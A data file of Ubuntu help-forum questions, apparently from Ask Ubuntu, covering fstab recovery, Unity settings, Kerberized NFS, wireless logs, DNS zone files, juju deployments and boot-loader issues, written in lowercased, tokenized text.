81726	how to rebuild fstab automatically	i accidentally removed all the entries from the fstab files while doing a backup ( yeah , i know ; ) ) . i would like to know if there is a way to rebuild it with the current mount options , since i did not restart the server since the deletion . if there is no such program , could anybody help me rebuild it . using this , i have found the command to show the current setup , but i do n't know what to do with it . $ sudo blkid /dev/sda1 : uuid= '' 3fc55e0f-a9b3-4229-9e76-ca95b4825a40 '' type= '' ext4 '' /dev/sda5 : uuid= '' 718e611d-b8a3-4f02-a0cc-b3025d8db54d '' type= '' swap '' /dev/sdb1 : label= '' files_server_int '' uuid= '' 02fc2eda-d9fb-47fb-9e60-5fe3073e5b55 '' type= '' ext4 '' /dev/sdc1 : uuid= '' 41e60bc2-2c9c-4104-9649-6b513919df4a '' type= '' ext4 '' /dev/sdd1 : label= '' expansion drive '' uuid= '' 782042b920427e5e '' type= '' ntfs '' $ cat /etc/mtab /dev/sda1 / ext4 rw , errors=remount-ro 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 none /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 none /dev devtmpfs rw , mode=0755 0 0 none /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 none /dev/shm tmpfs rw , nosuid , nodev 0 0 none /var/run tmpfs rw , nosuid , mode=0755 0 0 none /var/lock tmpfs rw , noexec , nosuid , nodev 0 0 none /lib/init/rw tmpfs rw , nosuid , mode=0755 0 0 none /var/lib/ureadahead/debugfs debugfs rw , relatime 0 0 /dev/sdc1 /home ext4 rw 0 0 /dev/sdb1 /media/files_server ext4 rw 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 /dev/sdd1 /media/expansion\040drive fuseblk rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions 0 0 gvfs-fuse-daemon /home/yvoyer/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=yvoyer 0 0 /dev/sdd1 /media/backup500 fuseblk rw , nosuid , nodev , sync , allow_other , blksize=4096 , default_permissions 0 0 /dev/sr0 /media/dir-615 iso9660 ro , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 0 0 gvfs-fuse-daemon /home/cdrapeau/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=cdrapeau 0 0
81727	how to set unity as default again ?	about an hour ago , i asked how i could set gnome-shell as default desktop interface for ubuntu replacing unity , and i was advised to issue this command : sudo /usr/lib/lightdm/lightdm-set-defaults -s gnome-shell while this is related to that , it 's a different question . now , how do i set unity back as default via command line ?
81732	can i put more applications in a unity icon ?	is it possible to 'enclose ' more than one application in a single unity icon/button ? in order to keep under control the number of buttons on launcher , it will be very useful to me to store some applications of the same type ( e.g . small accessory applications like take screenshot or web application etc. ) in a single button as that is possible with the xfce panel ...
81736	install and share canon lide 110 on the network	i 'd like to setup my canon lide 110 and share it on the network so it 's visible on the network and is available as a scanner . we have some mac 's on the network so ideally the scanner should be visible to these machines as well .
81740	enhancing the nautilus search option	in nautilus if i press ctrl+f inside a folder i get a search box that helps me search in the current directory and sub directories for specific names and types of files , but what if i want to : find all files ( including files without extensions ) find a file without an extension ( without the dot symbol or without any other name/extension separator ) find a file with/without a special character find all files that start/not start with a character find all files that end/not end with a character find all files that start/no start with a character but end/not end with a character find only files/folders find files with specific text in them find files with less/more/equal than/to x size find files modified/created in x date i ask since the kde 's search has all of this ways of searching for especific types of files and is much better in thism giving a pretty good freedom for when i want to go searching for virtually anything .
81745	which is lighter/quicker : lxdm or lightdm ?	i am using lubuntu and i am just wondering whether it would be worth switching from the default lxdm to lightdm . are there any speed advantages of lightdm over lxdm ? ( an answer with more than one work is preferred . )
81749	phone pictures not showing in ubuntuone folder on computer	i downloaded the android app for my phone and set it up to move my pictures from the phone into ubuntuone . when i go to the ubuntuone web site the folder shows up and i can view the pictures after i download them . but when i open the ubuntuone folder on my laptop , the folder with the pictures from my phone is n't listed . how can i get the picture folder to show up in the ubuntuone folder on my laptop ? i was hoping this would be an easy way to get photos from phone to computer .
81750	setup for mounting kerberized nfs home directory - gssd not finding valid kerberos ticket	our home directories are exported via kerberized nfs , so the user needs a valid kerberos ticket to be able to mount its home . this setup works fine with our existing clients & server . now we want to add some 11.10 client and thus set up ldap & kerberos together with pam_mount . the ldap authentication works and users can login via ssh , however their homes can not be mounted . when pam_mount is configured to mount as root , gssd does not find a valid kerberos ticket and the mount fails . nov 22 17:34:26 zelda rpc.gssd [ 929 ] : handle_gssd_upcall : 'mech=krb5 uid=0 enctypes=18,17,16,23,3,1,2 ' nov 22 17:34:26 zelda rpc.gssd [ 929 ] : handling krb5 upcall ( /var/lib/nfs/rpc_pipefs/nfs/clnt2 ) nov 22 17:34:26 zelda rpc.gssd [ 929 ] : process_krb5_upcall : service is ' < null > ' nov 22 17:34:26 zelda rpc.gssd [ 929 ] : getting credentials for client with uid 0 for server purple.physcip.uni-stuttgart.de nov 22 17:34:26 zelda rpc.gssd [ 929 ] : cc file '/tmp/krb5cc_65678_ku2226 ' being considered , with preferred realm 'purple.physcip.uni-stuttgart.de' nov 22 17:34:26 zelda rpc.gssd [ 929 ] : cc file '/tmp/krb5cc_65678_ku2226 ' owned by 65678 , not 0 nov 22 17:34:26 zelda rpc.gssd [ 929 ] : warning : failed to create krb5 context for user with uid 0 for server purple.physcip.uni-stuttgart.de nov 22 17:34:26 zelda rpc.gssd [ 929 ] : doing error downfall when pam_mount is on the other hand configured with the noroot=1 option , then it can not mount the volume at all . nov 22 17:33:58 zelda sshd [ 2226 ] : pam_krb5 ( sshd : auth ) : user phy65678 authenticated as phy65678 @ purple.physcip.uni-stuttgart.de nov 22 17:33:58 zelda sshd [ 2226 ] : accepted password for phy65678 from 129.69.74.20 port 51875 ssh2 nov 22 17:33:58 zelda sshd [ 2226 ] : pam_unix ( sshd : session ) : session opened for user phy65678 by ( uid=0 ) nov 22 17:33:58 zelda sshd [ 2226 ] : pam_mount ( mount.c:69 ) : messages from underlying mount program : nov 22 17:33:58 zelda sshd [ 2226 ] : pam_mount ( mount.c:73 ) : mount : only root can do that nov 22 17:33:58 zelda sshd [ 2226 ] : pam_mount ( pam_mount.c:521 ) : mount of /volumes/home/phy65678 failed so how can we allow users of a specific group to perform nfs mounts ? if this does not work , can we make pam_mount use root but pass the correct uid ?
81752	is it possible to change the colour of the launcher/dash `` glass '' ?	the launcher and dash have a semitransparent background which i think of as being made of black glass . i know you can change the transparency of the launcher ( not sure about the dash ) , but is it possible to change the colour of this glass ?
81753	unable to install 11.10 to new ocz agility 3 ssd	i know the discussion here where they are not getting the same error as i. i use lenovo thinkpad x60 . the default partition table : sd1 ext4 53.91gb , sd2 extended 1.99gb and sd5 swap 1.99gb . i get input/output error during read on /dev/sda when trying to install from livecd -mode and when trying to install directly . i get the error normally at the stage of choosing time zone or very last at choosing the keyboard layout . then there is the box with buttons : back , ignore and continue . neither of them put the process forward so i need to cancel it . how can you install ubuntu to sdd disk ?
81757	sharing between host and guest in virtualbox	since ubuntu 11.10 use a new kernel , it 's very difficult to have a decent support for virtualization . virtualbox does n't support guest additions for ubuntu 11.10 , so i ca n't copy to and from my ubuntu desktop and windows , which i absolutely require , plus freebsd seems not to be able to use dhcp without guest additions . virt-manager instead gives an error on launch : unable to open a connection to the libvirt management daemon . libvirt uri is : qemu : ///system verify that : - the 'libvirt-bin ' package is installed - the 'libvirtd ' daemon has been started - you are member of the 'libvirtd ' group unable to connect to '/var/run/libvirt/libvirt-sock ' , libvirtd may need to be started : permission denied traceback ( most recent call last ) : file `` /usr/share/virt-manager/virtmanager/connection.py '' , line 1146 , in _open_thread self.vmm = self._try_open ( ) file `` /usr/share/virt-manager/virtmanager/connection.py '' , line 1130 , in _try_open flags ) file `` /usr/lib/python2.7/dist-packages/libvirt.py '' , line 102 , in openauth if ret is none : raise libvirterror ( 'virconnectopenauth ( ) failed ' ) libvirterror : unable to connect to '/var/run/libvirt/libvirt-sock ' , libvirtd may need to be started : permission denied the problem is solved by running virt-manager as root , but i do n't like that . how do i change permissions to run virt-manager as user ? is there a way to install guest additions on ubuntu 11.10 ?
81761	how to fully remove the eclipse package ?	i installed eclipse via command apt-get install eclipse . this command completed correctly . after this , i run eclipse and add some configurations : added a new url for `` available software sites '' . on the next step , i try removed eclipse via apt-get remove eclipse and install eclipse again . and here i see a surprise : in the newly installed eclipse , i see my old url for `` available software sites '' . so , i guess , that the configuration file ( s ) is not removed . after this i tried different commands : something like this : sudo dpkg -r eclipse sudo apt-get -- purge remove eclipse sudo apt-get autoremove but after i again install eclipse i see my url . how i can fully remove eclipse along with its configuration files ?
81762	what 's going on with my wireless ?	the wifi on my acer laptop ( it 's a 3810tz , with intel corporation centrino wireless-n 1000 ) works flawlessly on ubuntu 11.04 . on 11.10 , it 's continually up and down , and it fills the system log with messages such as those below . what is going on ? it seems to be unable to decide which regulatory domain it 's in . despite the system configuration being quite clearly set to uk it persists in configuring itself as though it was opeating in taiwan ! nov 22 15:34:37 mes3810 wpa_supplicant [ 1053 ] : wpa : 4-way handshake failed - pre-shared key may be incorrect nov 22 15:34:37 mes3810 wpa_supplicant [ 1053 ] : ctrl-event-disconnected bssid=00:50:7f:72 : bf : b0 reason=15 nov 22 15:34:37 mes3810 wpa_supplicant [ 1053 ] : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 nov 22 15:34:37 mes3810 kernel : [ 18239.240355 ] cfg80211 : all devices are disconnected , going to restore regulatory settings nov 22 15:34:37 mes3810 kernel : [ 18239.240362 ] cfg80211 : restoring regulatory settings nov 22 15:34:37 mes3810 kernel : [ 18239.240368 ] cfg80211 : calling crda to update world regulatory domain nov 22 15:34:37 mes3810 kernel : [ 18239.240408 ] wlan0 : deauthenticating from 00:50:7f:72 : bf : b0 by local choice ( reason=3 ) nov 22 15:34:37 mes3810 networkmanager [ 875 ] : ( wlan0 ) : supplicant interface state : 4-way handshake - > disconnected nov 22 15:34:37 mes3810 kernel : [ 18239.246556 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain nov 22 15:34:37 mes3810 kernel : [ 18239.246563 ] cfg80211 : world regulatory domain updated : nov 22 15:34:37 mes3810 kernel : [ 18239.246567 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) nov 22 15:34:37 mes3810 kernel : [ 18239.246572 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.246577 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.246582 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.246587 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.246592 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) nov 22 15:34:37 mes3810 networkmanager [ 875 ] : ( wlan0 ) : supplicant interface state : disconnected - > scanning nov 22 15:34:37 mes3810 wpa_supplicant [ 1053 ] : trying to authenticate with 00:50:7f:72 : bf : b0 ( ssid='poplarhouse ' freq=2412 mhz ) nov 22 15:34:37 mes3810 networkmanager [ 875 ] : ( wlan0 ) : supplicant interface state : scanning - > authenticating nov 22 15:34:37 mes3810 kernel : [ 18239.509877 ] wlan0 : authenticate with 00:50:7f:72 : bf : b0 ( try 1 ) nov 22 15:34:37 mes3810 wpa_supplicant [ 1053 ] : trying to associate with 00:50:7f:72 : bf : b0 ( ssid='poplarhouse ' freq=2412 mhz ) nov 22 15:34:37 mes3810 kernel : [ 18239.512276 ] wlan0 : authenticated nov 22 15:34:37 mes3810 kernel : [ 18239.512615 ] wlan0 : associate with 00:50:7f:72 : bf : b0 ( try 1 ) nov 22 15:34:37 mes3810 networkmanager [ 875 ] : ( wlan0 ) : supplicant interface state : authenticating - > associating nov 22 15:34:37 mes3810 kernel : [ 18239.516508 ] wlan0 : rx reassocresp from 00:50:7f:72 : bf : b0 ( capab=0x431 status=0 aid=1 ) nov 22 15:34:37 mes3810 kernel : [ 18239.516514 ] wlan0 : associated nov 22 15:34:37 mes3810 wpa_supplicant [ 1053 ] : associated with 00:50:7f:72 : bf : b0 nov 22 15:34:37 mes3810 kernel : [ 18239.529097 ] cfg80211 : calling crda for country : tw nov 22 15:34:37 mes3810 networkmanager [ 875 ] : ( wlan0 ) : supplicant interface state : associating - > associated nov 22 15:34:37 mes3810 kernel : [ 18239.535680 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : nov 22 15:34:37 mes3810 kernel : [ 18239.535688 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535692 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : nov 22 15:34:37 mes3810 kernel : [ 18239.535697 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535702 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : nov 22 15:34:37 mes3810 kernel : [ 18239.535707 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535711 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : nov 22 15:34:37 mes3810 kernel : [ 18239.535716 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535720 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : nov 22 15:34:37 mes3810 kernel : [ 18239.535725 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535730 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : nov 22 15:34:37 mes3810 kernel : [ 18239.535735 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535739 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : nov 22 15:34:37 mes3810 kernel : [ 18239.535744 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535748 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : nov 22 15:34:37 mes3810 kernel : [ 18239.535753 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535757 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : nov 22 15:34:37 mes3810 kernel : [ 18239.535763 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535767 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : nov 22 15:34:37 mes3810 kernel : [ 18239.535772 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535777 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : nov 22 15:34:37 mes3810 kernel : [ 18239.535782 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535786 ] cfg80211 : disabling freq 2467 mhz nov 22 15:34:37 mes3810 kernel : [ 18239.535789 ] cfg80211 : disabling freq 2472 mhz nov 22 15:34:37 mes3810 kernel : [ 18239.535794 ] cfg80211 : regulatory domain changed to country : tw nov 22 15:34:37 mes3810 kernel : [ 18239.535797 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) nov 22 15:34:37 mes3810 kernel : [ 18239.535802 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535807 ] cfg80211 : ( 5270000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) nov 22 15:34:37 mes3810 kernel : [ 18239.535812 ] cfg80211 : ( 5735000 khz - 5815000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) nov 22 15:34:38 mes3810 networkmanager [ 875 ] : ( wlan0 ) : supplicant interface state : associated - > 4-way handshake any ideas ?
81763	how can i change the background color of the unity launcher ?	i really dislike the slight dark-purple tint to the side-launcher bar and shell surrounding the menu after pressing the meta key . how can i set this to another color ? there are configure options available for unity here but there is no option for this , so i am looking for pointers in the code where this can be set .
81770	why does reinstalling a package only take a short time the second time ?	let 's say i first install some package using apt-get , for example : apt-get install some-package then i remove this package using : apt-get remove some-package now i try to install that same package again but the install process finishes very quickly . why is that ? does apt-get save downloaded files ?
81779	server is dropping ssh connections , then not allowing me to log back on	i have an esx box which i have loaded with two ubuntu server machines . during setup , i chose no additional packages to install as i just wanted a lightweight machine for testing . the first thing i did was change the root password via sudo passwd after esx got on my nerves through lag , i decided to install openssh via apt-get install openssh-server . it did it 's business , and i then opened putty and could connect in to both machines fine . the first time it connected , it asked me to add the ssh key as obviously it did not know it . anyway , the second server is working flawlessly , but , the first seems to be giving me trouble . i was in the middle of typing a sentence when it kicked me off for no reason and when i tried to reconnect , putty gave me a warning that the ssh key had changed and it is potentially dangerous . i attempted to log in anyway and it did not work , just the standard access denied message . using the second machine , i sshed in to the first machine and it worked straight away , i then killed the ssh sessions ( and possibly ssh server ) , i then reconnected via putty and i again received the security warning message , but , it allowed me to log on fine . ... i thought `` glitch '' and nothing more of it , but , it just happened again ! i really do not understand this and was hoping someone here can help ?
81783	need to set up shared storage for guest virtual machines that are running on a xen host	my environment : i am doing these things at home with the purpose of learning about virtualization techniques . my machine have quad core processor that supports intel-vt and 8gb ram . xen is the virtualization platform . in short , all domus are lvm based . mainly i have two questions ; i need to have shared storage for these vms . something like nfs / nas / iscsi etc . however , i do n't know which one is the best solution . therefore , can someone tell me which suits best ? please note that , this shared storage need to be accessed by the other physical machines in the network . how to implement the selected solution for question # 1 ? any tutorials / guidelines / ebooks will be a great help and highly appreciated . thank you in advance : )
81784	desktop notification sounds not working after recent upgrades	after recent updates , desktop notification sounds stopped working . for example , sounds in pidgin no longer work . but when i go to pidgin sound preferences and preview the sounds , they work . also the sound in the applications work fine as usual . could this be a bug or is there some workaround for this problem ?
81785	screen resolution is low in tty with fglrx ?	my screen resolution is 1600x900p normally . without specific graphic drivers it 900p in grub and ttys , too . if i install fglrx as driver it is set to 640x480p when i start a tty , and the widescreen causes big `` pulled '' letters on my screen . does anyone know how to fix that ?
81790	computer wo n't start after install of ubuntu	i installed ubuntu and now i get black screen with a blinking line when i start my computer . how do i fix this ?
81793	how to initiate syncing	i have got a few directories i use daily and i would like to sync them with ubuntu one . but if i mark these directories only an ok flag is shown on the directory icon but nothing more happens . i realized if i copy files inside of the folder they get synced.. thus i used touch on other files but nothing happen . how can i initiate syncing of such folders ?
81797	nslookup finds ip , but ping doesnt	i know this looks like all the other `` can ping via ip but not dns '' questions , but those didnt really help me at all . also , having hosts files in all machines is not doable as this server will eventually handle a lot of computers connecting to it . i have a ldap+dns server set , and i want the computers on my network to authenticate on the ldap server . the ldap part of it is working just fine and i can ssh into the ldap server with the ldap credentials just fine . the problem comes with the client machines , the client is set to use the dns server ( in this case 192.168.0.243 ) and if i get in the terminal and do a nslookup it finds the ldap server just fine . fernando @ desktest : ~ $ nslookup ldap.mynet.local server : 192.168.0.243 address : 192.168.0.243 # 53 name : ldap.mynet.local address : 192.168.0.243 but when i ping it doesnt find the ip address . just hangs there looking pretty till i ctrl-c it . of course pinging by ip address works just fine . here are the zone files for the dns server fernando @ ldap : ~ $ cat /etc/bind/named.conf.local zone `` mynet.local '' { type master ; file `` /etc/bind/db.mynet.local '' ; } ; zone `` 0.168.192.in-addr.arpa '' { type master ; notify no ; file `` /etc/bind/db.192 '' ; } ; fernando @ ldap : ~ $ cat /etc/bind/db.mynet.local ; ; bind data file for local loopback interface ; $ ttl 604800 @ in soa ns.mynet.local . root.mynet.local . ( 7 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; @ in ns ns.mynet.local . ns in a 192.168.0.243 server in a 192.168.0.250 desktest in a 192.168.0.249 remote in a 192.168.0.248 winserver in a 192.168.0.247 web in a 192.168.0.246 tempfs in a 192.168.0.245 ldap in a 192.168.0.243 antenarfb in a 192.168.0.253 antenapan in a 10.82.223.7 adslgvt in a 192.168.0.1 fernando @ ldap : ~ $ cat /etc/bind/db.192 ; ; bind reverse data file for local loopback interface ; $ ttl 604800 @ in soa mynet.local . root.mynet.local . ( 6 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; @ in ns ns . 1 in ptr ns.mynet.local . 2 in ptr server.mynet.local . 3 in ptr desktest.mynet.local . 4 in ptr remote.mynet.local . 5 in ptr winserver.mynet.local . 6 in ptr web.mynet.local . 7 in ptr tempfs.mynet.local . 8 in ptr ldap.mynet.local . 9 in ptr antenarfb.mynet.local . 10 in ptr antenapan.mynet.local . 11 in ptr adslgvt.mynet.local . fernando @ ldap : ~ $ i am really at a loss about what to do and any help will be greatly appreciated . -- -- edit -- -- before anybody asks , yes the server is running : ) root @ ldap : /etc/bind # rndc status version : 9.7.0-p1 cpus found : 1 worker threads : 1 number of zones : 16 debug level : 0 xfers running : 0 xfers deferred : 0 soa queries in progress : 0 query logging is off recursive clients : 0/0/1000 tcp clients : 0/100 server is up and running -- -- end edit -- --
81798	how to set a default login screen that has changed ?	i have ubuntu 11.10 . i had lightdm as the default login manager , but now i have as the default the one from gnome-shell . how can i get back to the lightdm login manager from ubuntu 's unity ?
81803	gvim 7.3 exits with error information on ubuntu 11.10 amd64	i installed gvim 7.3 from ubuntu software center . i can successfully run it in a terminal but after it exits , warning messages will show in that terminal . i 've tried to solve it but , no effect . can anyone tell me why this happens and how to get rid of these errors ? thanks ! ( gvim:1963 ) : gdk-warning ** : using cairo rendering requires the drawable argument to have a specified colormap . all windows have a colormap , however , pixmaps only have colormap by default if they were created with a non-null window argument . otherwise a colormap must be set on them with gdk_drawable_set_colormap ( gvim:1963 ) : gdk-critical ** : ia__gdk_cairo_region : assertion `region ! = null ' failed ( gvim:1963 ) : gdk-critical ** : ia__gdk_cairo_region : assertion `region ! = null ' failed ( gvim:1963 ) : gdk-warning ** : using cairo rendering requires the drawable argument to have a specified colormap . all windows have a colormap , however , pixmaps only have colormap by default if they were created with a non-null window argument . otherwise a colormap must be set on them with gdk_drawable_set_colormap ( gvim:1963 ) : gdk-critical ** : ia__gdk_cairo_region : assertion `region ! = null ' failed ( gvim:1963 ) : gdk-critical ** : ia__gdk_cairo_region : assertion `region ! = null ' failed
81805	how do i enable my synaptics trackpad ?	when i booted 11.10 from the install cd , everything worked fine . however , once i installed ubuntu , my trackpad stopped working - does anyone know why this is so ?
81808	does the debian-installer install packages from remote repositories ?	i am installing lucid server from an iso image . could the debian-installer that come along that distribution install packages fetched from remote repositories during the install of a new system ? if that is the case , is there anyway to disable this behavior ? i am trying to create a stable system image , and one source of noise i want to avoid is updated packages .
81810	is it possible to change display settings and apply without logging out like windows ?	when i want to connect a second monitor or projector to my computer , i always have to change display settins , like seperate x screens configuration , and save and logout to apply new settings . it is really anoying . for example , if i configure my display settings for only use external monitor and save it and then unplug the external monitor , ubuntu does not understand that i unpluged it and it is continues to send display to external monitor . so in order to change my display setting i have to plugin external monitor again . is there a work around for this problem ?
81813	gnome-terminal and midnight-commander in different unity launcher 's groups	i have a gnome-terminal icon and midnight-commander icon in launcher . when i press mc icon and then press gnome-terminal icon both applications add to the group of applications of mc icon . how can i make them to appear in different icons ?
81815	ca n't install lib32ncurses5-dev or ia32-libs	i 'm trying to install android source and i keep getting this error . i kept with the installation but seems these packages are sort of required to have a complete and successful installation . this is my error package lib32ncurses5-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'lib32ncurses5-dev ' has no installation candidate e : package 'ia32-libs ' has no installation candidate e : unable to locate package lib32readline5-dev e : unable to locate package lib32z-dev i have a vm with ubuntu on intelâž coreâ˘ i5-2300 cpu @ 2.80ghz and 32-bit system
81817	how to install a `` pdf printer '' ?	is there a way to install a printer that prints to pdf ? there 's a lot of discussions about this in the web foruns , but none seens to work .
81818	failure to troubleshoot a juju charm deployment	my environments.yaml looks like this : environments : test : type : local control-bucket : juju-a14dfae3830142d9ac23c499395c2785999 admin-secret : 6608267bbd6b447b8c90934167b2a294999 default-series : oneiric juju-origin : distro data-dir : /home/bruno/projects/juju juju bootstrap runs perfect : 2011-11-22 19:19:31,999 info bootstrapping environment 'test ' ( type : local ) ... 2011-11-22 19:19:32,004 info checking for required packages ... 2011-11-22 19:19:33,584 info starting networking ... 2011-11-22 19:19:34,058 info starting zookeeper ... 2011-11-22 19:19:34,283 info starting storage server ... 2011-11-22 19:19:40,051 info initializing zookeeper hierarchy 2011-11-22 19:19:40,247 info starting machine agent ( origin : distro ) ... [ sudo ] password for bruno : 2011-11-22 19:23:16,054 info environment bootstrapped 2011-11-22 19:23:16,079 info 'bootstrap ' command finished successfully deploy from a known good charm is accepted ( tried it with one that i am trying to create ) : juju deploy -- repository=/home/bruno/projects/charms_repo/ local : teamspeak 2011-11-22 19:28:49,929 info charm deployed as service : 'teamspeak' 2011-11-22 19:28:49,962 info 'deploy ' command finished successfully after this i can see that juju debug-log shows activity and i can see the network indicator going on and off and activity on my hard-disk . wait ... looking at juju status i get : services : teamspeak : charm : local : oneiric/teamspeak-1 relations : { } units : teamspeak/0 : machine : 0 public-address : 192.168.122.226 relations : { } state : start_error juju debug-log does not help and i have no files under /var/log/juju or /var/lib/juju . last juju debug-log only shows this : 2011-11-22 19:45:20,790 machine:0 : juju.agents.machine debug : units changed old : set ( [ 'wordpress/0 ' ] ) new : set ( [ 'wordpress/0 ' , 'teamspeak/0 ' ] ) 2011-11-22 19:45:20,823 machine:0 : juju.agents.machine debug : starting service unit : teamspeak/0 ... 2011-11-22 19:45:21,137 machine:0 : juju.agents.machine debug : downloading charm local : oneiric/teamspeak-1 to /home/bruno/projects/juju/bruno-test/charms 2011-11-22 19:45:22,115 machine:0 : juju.agents.machine debug : starting service unit teamspeak/0 2011-11-22 19:45:22,133 machine:0 : unit.deploy info : creating container teamspeak-0 ... 2011-11-22 19:47:04,586 machine:0 : unit.deploy info : container created for teamspeak/0 2011-11-22 19:47:04,781 machine:0 : unit.deploy debug : charm extracted into container 2011-11-22 19:47:04,801 machine:0 : unit.deploy debug : starting container ... 2011-11-22 19:47:07,086 machine:0 : unit.deploy info : started container for teamspeak/0 2011-11-22 19:47:07,107 machine:0 : juju.agents.machine info : started service unit teamspeak/0 how can i troubleshot what is happening here ?
81823	configure apache server to accept same domain post requests	i keep getting 405 errors when i try to send post ajax requests on localhost from a page to another.i understood this is a server configuration.can anyone help ?
81824	how can i switch a 32-bit installation to a 64-bit one ?	i 've got a 32-bit ubuntu installation running on 64-bit hardware . now that multi-arch has been implemented , i would like to switch to 64-bit without having to reinstall the os . this is one of the user stories addressed by the spec : shawn installed his system using the 32-bit version of ubuntu , but his hardware is 64-bit and he wants to switch over . he manually installs the amd64 versions of dpkg and apt , replacing the i386 versions and changing which architecture is used as the default ; then he installs the amd64 ubuntu-minimal package ; then he installs the amd64 ubuntu-desktop package . over time the remaining i386 packages are replaced automatically on upgrade . however , when trying to follow the instructions in there , i can not find any 64-bit version of dpkg or apt . did this user story got implemented in a different way in the final spec , or do i need to do something differently ? in short , how can i switch my 32-bit installation to 64-bit ?
81826	how can i use aptitude to install nagios ?	i 've seen several guides online which describe downloading and building nagios on ubuntu servers . is there also an aptitude package i could use to install nagios 3 ?
81828	burg updates , but does n't show up in boot up grub screen	i recently updated the linux kernel ( via the update manager ) to 3.0.0-13 . i am running ubuntu 11.10 using burg . everything loaded correctly , burg updated correctly . but when i reboot , when the grub screen comes on the monitor it only reflects 3.0.0-12 . i reloaded the linux kernel 3.0.0-13 . did the `` update-burg '' ( see the results below ) , rebooted and still it loads grub window with the 3.0.0-12 kernel . what am i doing wrong , or has anyone had this problem ? how do i fix this , i do n't want to go mucking around with grub as i really do n't know that much about it ( i.e . manually configuring the grub/burg files ) . [ 14:22:52 ] xxxxxxxx @ l01u1110 : ~ $ sudo update-burg generating burg.cfg ... found linux image : /boot/vmlinuz-3.0.0-13-generic found initrd image : /boot/initrd.img-3.0.0-13-generic found linux image : /boot/vmlinuz-3.0.0-12-generic found initrd image : /boot/initrd.img-3.0.0-12-generic found windows 7 ( loader ) on /dev/sda1 found ubuntu 11.04 ( 11.04 ) on /dev/sda5 done
